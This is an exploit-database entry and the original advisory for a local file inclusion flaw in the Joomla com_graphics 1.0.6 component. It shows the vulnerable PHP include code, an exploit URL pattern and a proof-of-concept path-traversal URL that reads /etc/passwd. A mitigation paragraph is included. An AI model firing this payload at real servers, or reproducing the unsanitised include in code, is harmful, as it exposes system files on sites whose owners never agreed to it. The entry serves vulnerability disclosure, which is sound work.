Joomla Component graphics (com_graphics) v1.0.6 LFI Vulnerability

vendor:

com_graphics

by:

wishnusakti + inc0mp13te (HH)

8,8

CVSS

HIGH

Local File Inclusion (LFI)

CWE

Product Name: com_graphics

Affected Version From: 1.0.6

Affected Version To: 1.0.6

Patch Exists: NO

Related CWE: N/A

CPE: a:htmlcoderhelper:com_graphics:1.0.6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component graphics (com_graphics) v1.0.6 LFI Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The application then includes the file specified in the request, allowing an attacker to view arbitrary files on the server.

Mitigation:

The application should validate user input and filter out any special characters. Additionally, the application should be configured to only allow access to files that are necessary for the application to function.

Source

Exploit-DB raw data:

 ================================================================================================

 Title    : Joomla Component graphics (com_graphics) v1.0.6 LFI Vulnerability
 Vendor   : http://htmlcoderhelper.com/
 Download : http://en.sourceforge.jp/frs/g_redir.php?m=jaist&f=%2Fjoomlagraphics%2Fcom_graphics.zip

 Date     : 27 April 2010 - GMT +07:00 Jakarta, Indonesia
 Author   : wishnusakti + inc0mp13te (HH)
 Contact  : evileyes60117[at]yahoo.com

 ================================================================================================

 [+] Vulnerable

     ./components/com_graphics/graphics.php

     // Require specific controller if requested
	if($controller = JRequest::getVar( 'controller' )) {
    	require_once( JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php' );
	}


 [+] Exploit

     http://[site]/[path]/index.php?option=com_graphics&controller=[LFI]

 [+] PoC

     http://localhost/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00

 ================================================================================================

 Very Special thanks :
     Penghuni #nob0dy priv8 Server
     (ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, cheche angela zhang, madonk, & Bot² Scan :D)
 
     en Semua Komunitas Hacking Tanah Air
     Peace Yo :)

to all my friends : mywisdom, aurell, hafiz, xco, kiddies, xshadow, gblack, petimati, 
                    cakill, krembis, biakkobar, hendri_note, xshadow, local_disaster, pradipta yoarsa


 ================================================================================================

# ./wishnusakti #.inc0mp13te